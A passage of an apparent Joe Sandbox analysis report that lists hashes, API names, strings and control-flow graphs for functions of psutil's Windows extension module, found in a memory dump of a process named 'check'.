                                                                                                                                                                                                                • Instruction ID: 1ec5bb6286e75138111ea85eac19ab25bf4773e6effa7fc74ffcb3c548669f43
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fe35ee0cee9196c9350aa1929796caaec3d297f6f1b8f1f090c40a2d7c9568f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED2153A1F1C90681EB749B77E4401792361EF8CB84FC46035DA9D437A5FF2DE4458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$malloc$Err_InformationMemoryQuerySystem
                                                                                                                                                                                                                • String ID: NtQuerySystemInformation (no PID found)$NtQuerySystemInformation(SystemProcessInformation)
                                                                                                                                                                                                                • API String ID: 2506067127-1914444273
                                                                                                                                                                                                                • Opcode ID: c1f39219ef529a7d1b02474b8a8397f5895c2532aa83dbe5a712c8285f180f06
                                                                                                                                                                                                                • Instruction ID: e5105b33b7fc36eb08f7740b462fe299974cf54ee8876f578a18718285847597
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1f39219ef529a7d1b02474b8a8397f5895c2532aa83dbe5a712c8285f180f06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B73177B5B0DA4682EB249B36E45413967A0FF4CB84F942434DA8E83BA4FF3DE4418780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$Arg_BuildCallCloseDeallocErr_ErrorFunctionHandleInformationLastObjectObject_OpenParseQueryTupleValue
                                                                                                                                                                                                                • String ID: NtQueryInformationProcess$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 2930197940-1336995763
                                                                                                                                                                                                                • Opcode ID: 6001fec04dc8f923077f7470f88e55ada98714560efaf6b8697b7bc6922b23ba
                                                                                                                                                                                                                • Instruction ID: 8f53f2943e44283f1b49e7d5e1d830f5969b356cff59a0feaa2f0500a33be4c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6001fec04dc8f923077f7470f88e55ada98714560efaf6b8697b7bc6922b23ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D521A4A1B0CA4282FB20DB33F44427963A1EF9C794FD46135DA8D476A5FE3CE4898780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_FreeThread$Arg_BuildCharDiskErr_FilenameFromMem_ObjectParseRestoreSaveSpaceStringTupleUnicode_ValueWideWindowsWith
                                                                                                                                                                                                                • String ID: (LL)
                                                                                                                                                                                                                • API String ID: 4101313974-591180812
                                                                                                                                                                                                                • Opcode ID: b068e9dae5a6de77f38790b3924a703566198fee7ed684031e271233b0b90aa3
                                                                                                                                                                                                                • Instruction ID: 8c7dd090cf8edd5232b0a96f357a0b1e43777a92b0d1c4ddfffa59ae3a1aa574
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b068e9dae5a6de77f38790b3924a703566198fee7ed684031e271233b0b90aa3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B113365B08E8681EB209B77F4440A9A760FF9DB94B891032D98D43724EE7CD545C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$Arg_CallCloseDeallocErr_ErrorFunctionHandleInformationLastObjectObject_OpenParseTuple
                                                                                                                                                                                                                • String ID: NtSetInformationProcess$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 2437414965-2953277767
                                                                                                                                                                                                                • Opcode ID: 55e2a84ace86b59902f4081047c486fe4386992492a4237446058aee31be4aed
                                                                                                                                                                                                                • Instruction ID: 54507703c1c18744700e1d78551fcb31ec77a6a1b6049cc5b784666ebc087cdc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55e2a84ace86b59902f4081047c486fe4386992492a4237446058aee31be4aed
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 962174A1B1DA4291FB249B77E4841792361EF9C780FC46035DA9D43765FF2CE48487C0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: b8a3f4a000f899b476dfa274a2e1eb7cf38e98b0b77c6146e29622830b712c9c
                                                                                                                                                                                                                • Instruction ID: b78e47b2820ff5c0d11c96f1cda920f526b2c91d332a6d6e2a08f723845e4426
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8a3f4a000f899b476dfa274a2e1eb7cf38e98b0b77c6146e29622830b712c9c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E33150B2709A818AEB709F71E8407ED73A0FF88744F84503ADA8D57A94EF38D548C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Service$Arg_CloseHandleParseStartTuple
                                                                                                                                                                                                                • String ID: StartService
                                                                                                                                                                                                                • API String ID: 2343249381-99420325
                                                                                                                                                                                                                • Opcode ID: bd06afd057e7d5728987b8bacab01cf6a86a3d34312b0c3eb040550a7b2aa7c7
                                                                                                                                                                                                                • Instruction ID: b0a631d0eab76786d3500a62c316dff549bd53d002b5e63ed828e63f68d71205
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd06afd057e7d5728987b8bacab01cf6a86a3d34312b0c3eb040550a7b2aa7c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E01EDA4B49A4681EB349B37E85017523A0BF8DB84FC82035DA8D42755FE3DE5458780

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 364 7ffb9dd651a0-7ffb9dd651f8 PyArg_ParseTuple 365 7ffb9dd6533b-7ffb9dd6533d 364->365 366 7ffb9dd651fe-7ffb9dd65211 364->366 369 7ffb9dd6547b-7ffb9dd654a2 call 7ffb9dd6a0a0 365->369 367 7ffb9dd65221-7ffb9dd65237 OpenProcess 366->367 368 7ffb9dd65213-7ffb9dd6521f call 7ffb9dd61180 366->368 372 7ffb9dd65257-7ffb9dd6525c call 7ffb9dd67a40 367->372 373 7ffb9dd65239-7ffb9dd65242 GetLastError 367->373 378 7ffb9dd65261-7ffb9dd65267 368->378 372->378 373->372 376 7ffb9dd65244-7ffb9dd65252 call 7ffb9dd61070 373->376 376->369 378->365 381 7ffb9dd6526d-7ffb9dd65282 OpenProcessToken 378->381 382 7ffb9dd65284-7ffb9dd652b1 GetLastError call 7ffb9dd61010 PyErr_SetFromWindowsErrWithFilename 381->382 383 7ffb9dd652b3-7ffb9dd652c3 malloc 381->383 388 7ffb9dd65322-7ffb9dd65333 CloseHandle 382->388 384 7ffb9dd6531c PyErr_NoMemory 383->384 385 7ffb9dd652c5 383->385 384->388 387 7ffb9dd652d0-7ffb9dd652f4 GetTokenInformation 385->387 390 7ffb9dd65350-7ffb9dd65367 CloseHandle * 2 387->390 391 7ffb9dd652f6-7ffb9dd652ff GetLastError 387->391 388->365 392 7ffb9dd65335 CloseHandle 388->392 390->365 395 7ffb9dd65369-7ffb9dd65384 malloc 390->395 393 7ffb9dd65342-7ffb9dd6534e call 7ffb9dd61070 391->393 394 7ffb9dd65301-7ffb9dd6531a free malloc 391->394 392->365 393->388 394->384 394->387 397 7ffb9dd65417 PyErr_NoMemory 395->397 398 7ffb9dd6538a 395->398 399 7ffb9dd6541d-7ffb9dd65420 397->399 401 7ffb9dd65390-7ffb9dd653a3 malloc 398->401 404 7ffb9dd65422-7ffb9dd65425 free 399->404 405 7ffb9dd6542b-7ffb9dd65437 free 399->405 402 7ffb9dd6557a PyErr_NoMemory 401->402 403 7ffb9dd653a9-7ffb9dd653d7 LookupAccountSidW 401->403 410 7ffb9dd65580-7ffb9dd65583 402->410 406 7ffb9dd654d2-7ffb9dd654dc 403->406 407 7ffb9dd653dd-7ffb9dd653e6 GetLastError 403->407 404->405 408 7ffb9dd65448-7ffb9dd6544b 405->408 409 7ffb9dd65439-7ffb9dd6543d 405->409 417 7ffb9dd654e0-7ffb9dd654e8 406->417 411 7ffb9dd653ec-7ffb9dd65411 free * 2 malloc 407->411 412 7ffb9dd654a3-7ffb9dd654ae GetLastError 407->412 415 7ffb9dd6545c-7ffb9dd6545f 408->415 416 7ffb9dd6544d-7ffb9dd65451 408->416 409->408 413 7ffb9dd6543f-7ffb9dd65442 _Py_Dealloc 409->413 410->399 414 7ffb9dd65589-7ffb9dd65592 free 410->414 411->397 411->401 418 7ffb9dd654b0-7ffb9dd654bc call 7ffb9dd61180 412->418 419 7ffb9dd654c1-7ffb9dd654cd call 7ffb9dd61070 412->419 413->408 414->399 421 7ffb9dd65471 415->421 422 7ffb9dd65461-7ffb9dd65466 415->422 416->415 420 7ffb9dd65453-7ffb9dd65456 _Py_Dealloc 416->420 417->417 423 7ffb9dd654ea-7ffb9dd654f9 PyUnicode_FromWideChar 417->423 418->410 419->410 420->415 424 7ffb9dd65473 421->424 422->421 427 7ffb9dd65468-7ffb9dd6546b _Py_Dealloc 422->427 423->410 428 7ffb9dd654ff 423->428 424->369 427->421 431 7ffb9dd65500-7ffb9dd65508 428->431 431->431 432 7ffb9dd6550a-7ffb9dd6551c PyUnicode_FromWideChar 431->432 432->410 433 7ffb9dd6551e-7ffb9dd65537 Py_BuildValue 432->433 433->410 434 7ffb9dd65539-7ffb9dd6553d 433->434 435 7ffb9dd6553f-7ffb9dd65542 _Py_Dealloc 434->435 436 7ffb9dd65548-7ffb9dd6554c 434->436 435->436 437 7ffb9dd6554e-7ffb9dd65551 _Py_Dealloc 436->437 438 7ffb9dd65557-7ffb9dd65575 free * 3 436->438 437->438 438->424
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$Dealloc$Err_ErrorLastmalloc$CloseHandle$FromMemory$CharOpenProcessTokenUnicode_Wide$AccountArg_BuildCallFilenameFunctionInformationLookupObjectObject_ParseTupleValueWindowsWith__stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (originated from %s)$GetTokenInformation$LookupAccountSidW$LookupAccountSidW -> ERROR_NONE_MAPPED$OpenProcess$OpenProcessToken$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 3415421272-2228157761
                                                                                                                                                                                                                • Opcode ID: 68b8963b0c6dded1526c4caa053f450d9b3446f0071a4d5c04e78b6400ab28a4
                                                                                                                                                                                                                • Instruction ID: 0a91099decd0945fdf006c4fad1cec2ded3c36e07e34cbaa45888b744a41d458
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68b8963b0c6dded1526c4caa053f450d9b3446f0071a4d5c04e78b6400ab28a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AB12CA1B0DA4286EA349B73E81827963A0FF5DB91FC56435D9CE427A4FE3CE4458780

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf$ErrorLast$CallCloseCodeDeallocErr_ExitFunctionHandleObjectObject_Process
                                                                                                                                                                                                                • String ID: GetExitCodeProcess$GetExitCodeProcess != STILL_ACTIVE$GetExitCodeProcess -> ERROR_ACCESS_DENIED (ignored)$OpenProcess$OpenProcess -> ERROR_INVALID_PARAMETER$OpenProcess -> ERROR_SUCCESS$OpenProcess -> ERROR_SUCCESS turned into AD$OpenProcess -> ERROR_SUCCESS turned into NSP$psutil-debug [%s:%d]> $psutil/arch/windows\proc_utils.c
                                                                                                                                                                                                                • API String ID: 2708412498-404906942
                                                                                                                                                                                                                • Opcode ID: 6ab42e8da564327604033457bdb72f0ef09061680685dd6206d40f04dffea4ba
                                                                                                                                                                                                                • Instruction ID: eeb83b8f565fd04d70060d3d1e065d69fb17d8bd42a6f357664f826d0cc215a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ab42e8da564327604033457bdb72f0ef09061680685dd6206d40f04dffea4ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB514FA1F1C90291EB749B3BE8552B92260AF8CB80FC52137D58D462B5FE2DE985C7C0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf$Thread$CloseCreateErr_ErrorFilenameFromHandleLastObjectSingleTerminateWaitWindowsWith__stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (originated from %s)$CreateThread$GetExitCodeThread$GetExitCodeThread (failed) -> TerminateThread$TerminateThread$WaitForSingleObject$WaitForSingleObject -> WAIT_FAILED$WaitForSingleObject -> WAIT_FAILED -> TerminateThread$get handle name thread timed out after %i ms$psutil-debug [%s:%d]> $psutil/arch/windows\proc_handles.c
                                                                                                                                                                                                                • API String ID: 3855189052-3547020968
                                                                                                                                                                                                                • Opcode ID: 0616cab3c0598e9ddc42e09be41e4733b357dd79c3e0ec360cf4145d93dd7668
                                                                                                                                                                                                                • Instruction ID: f020a29b468b366988ea79d2c785226f64dbe698e55a9c77e55c365918bd1595
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0616cab3c0598e9ddc42e09be41e4733b357dd79c3e0ec360cf4145d93dd7668
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51DBE0B0CA4291FB349B77E8552B92261AF4DB84FC03136D58E462A5FE3DE54986C0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf$free$BuildErrorInformationLastLogicalProcessorValue__stdio_common_vfprintfmalloc
                                                                                                                                                                                                                • String ID: GetLogicalProcessorInformationEx() count was 0$GetLogicalProcessorInformationEx() returned %u$Win < 7; cpu_count_cores() forced to None$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
                                                                                                                                                                                                                • API String ID: 3169716632-2623797460
                                                                                                                                                                                                                • Opcode ID: 9a37ace3c8a14a6a00afd14260db1a26e60c3b402299a2fdffc2dd5e8a3c3ec2
                                                                                                                                                                                                                • Instruction ID: 757f98ce2a732f718a855af789671b482bbbe7df5367ef0976861a24231b09aa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a37ace3c8a14a6a00afd14260db1a26e60c3b402299a2fdffc2dd5e8a3c3ec2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 725155A1F08A4282EB349B77E8541796761EF4DB80FC5213AC98D076A5FF2DE845C6C1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_free$Memorymalloc$AdaptersAddressesDeallocDict_StringTable
                                                                                                                                                                                                                • String ID: %wS$(Oikk)$GetIfTable() syscall failed
                                                                                                                                                                                                                • API String ID: 2607516402-3214263222
                                                                                                                                                                                                                • Opcode ID: 935595f68735a42025d1daf878037448eb2c0eb1bd1990644127996632be68e7
                                                                                                                                                                                                                • Instruction ID: f92e14d1937b8b1c790d8fd7ef6c38b4c999cd84c3dae861157ef2d5907cd7f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 935595f68735a42025d1daf878037448eb2c0eb1bd1990644127996632be68e7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6813FB1B0CA8685EB749F72E4042B963A0FF5DB54F886031DA8E47654FF3DE4048380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Service$Arg_CloseConfigErrorHandleLastParseQueryTuple
                                                                                                                                                                                                                • String ID: (OOOs)$QueryServiceConfigW$automatic$disabled$manual$unknown
                                                                                                                                                                                                                • API String ID: 2875933263-3989453403
                                                                                                                                                                                                                • Opcode ID: 4f8a934ceacdef149da47496c8c0265f9ba17993743bd7f42fb56ea816f95630
                                                                                                                                                                                                                • Instruction ID: 0f67537df729538b06d8dae7b7d2bb99cd9083ae6335ae62d264a2a824cbda3f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f8a934ceacdef149da47496c8c0265f9ba17993743bd7f42fb56ea816f95630
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01615CB1B0DA4286EA749F37E85417923A0BF5DB94BC56131CA9E027A4FF3CE545C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_ParseTuple
                                                                                                                                                                                                                • String ID: GetExitCodeProcess$OpenProcess$WaitForSingleObject$WaitForSingleObject() -> WAIT_ABANDONED$WaitForSingleObject() returned WAIT_ABANDONED$WaitForSingleObject() returned WAIT_TIMEOUT$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/arch/windows\proc.c
                                                                                                                                                                                                                • API String ID: 3371842430-1306819463
                                                                                                                                                                                                                • Opcode ID: 5e6c3f8e62c44b61b55eae0613985ac3f476f52ce4f9b0455584aa147b6f3dcd
                                                                                                                                                                                                                • Instruction ID: fca939a2a265285b78f8772c79a6a07d815881d4de98385bb463f0a0c021f93a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e6c3f8e62c44b61b55eae0613985ac3f476f52ce4f9b0455584aa147b6f3dcd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E510CA5B1C94682EA609B76E8501796761FF4DB94FC42032DACD43674FF2CE549C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
